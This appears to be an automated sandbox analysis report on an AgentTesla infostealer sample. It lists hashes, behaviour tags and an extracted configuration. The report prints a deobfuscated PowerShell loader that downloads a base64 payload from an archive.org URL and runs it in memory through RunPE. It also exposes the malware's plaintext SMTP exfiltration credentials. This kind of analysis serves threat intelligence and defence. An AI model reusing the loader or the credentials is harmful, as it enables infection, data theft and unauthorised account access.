agenttesla

General

Target

05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs
Size

500KB
Sample

241002-dwb8jsvbrn
MD5

5b4a21e35cce386f8692a4a5d684cb14
SHA1

38cefdde89a5577f3d89396afd6fc15c8f89200e
SHA256

05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7
SHA512

94543f5006c02fe0df66d9c6517831bc7afa22336372d2f87de1f0d21028b5d228850fe4d03e9c8721d4fb4e44d34c711a21a7abf35e1268f1293daab07b30b2
SSDEEP

12288:Ppg9Y9TU6WMHM8GjqgjuLlXxp7kuqXZqDpw20ADLlpfMom6av1o0pLtxoo/Obx5X:GUsZkfqezIZy30W7

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

1
# powershell snippet 0
2
invoke-expression "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.ilimm/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
3
4
# powershell snippet 1
5
$url = "https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt"
6
$base64content = (new-object system.net.webclient).downloadstring("https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt")
7
$binarycontent = [system.convert]::frombase64string($base64content)
8
$assembly = [reflection.assembly]::load($binarycontent)
9
$type = $assembly.gettype("RunPE.Home")
10
$method = $type.getmethod("VAI")
11
$method.invoke($null, [object[]]"txt.ilimm/ved.2r.39b345302a075b1bc0d45b632eb9ee62-bup//:sptth", "desativado", "desativado", "desativado", "RegAsm", "")
12

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Credentials

Protocol: smtp
Host:
mail.detarcoopmedical.com
Port:
587
Username:
mail@detarcoopmedical.com
Password:
To$zL%?nhDHN

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.detarcoopmedical.com
Port:
587
Username:
mail@detarcoopmedical.com
Password:
To$zL%?nhDHN
Email To:
photos@detarcoopmedical.com

Targets

- Target
  
  05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs
- Size
  
  500KB
- MD5
  
  5b4a21e35cce386f8692a4a5d684cb14
- SHA1
  
  38cefdde89a5577f3d89396afd6fc15c8f89200e
- SHA256
  
  05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7
- SHA512
  
  94543f5006c02fe0df66d9c6517831bc7afa22336372d2f87de1f0d21028b5d228850fe4d03e9c8721d4fb4e44d34c711a21a7abf35e1268f1293daab07b30b2
- SSDEEP
  
  12288:Ppg9Y9TU6WMHM8GjqgjuLlXxp7kuqXZqDpw20ADLlpfMom6av1o0pLtxoo/Obx5X:GUsZkfqezIZy30W7
Score

10^/10

execution agenttesla discovery keylogger spyware stealer trojan
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in visual basic.
  keylogger trojan stealer spyware agenttesla
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Run Powershell and hide display window.
  execution
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Reads user/profile data of local email clients
  Email clients store some user data on disk where infostealers will often target it.
  spyware stealer
- Reads user/profile data of web browsers
  Infostealers often target stored browser data, which can include saved credentials etc.
  spyware stealer
- Looks up external IP address via web service
  Uses a legitimate IP lookup service to find the infected system's external IP.
- Suspicious use of SetThreadContext
behavioral1 behavioral2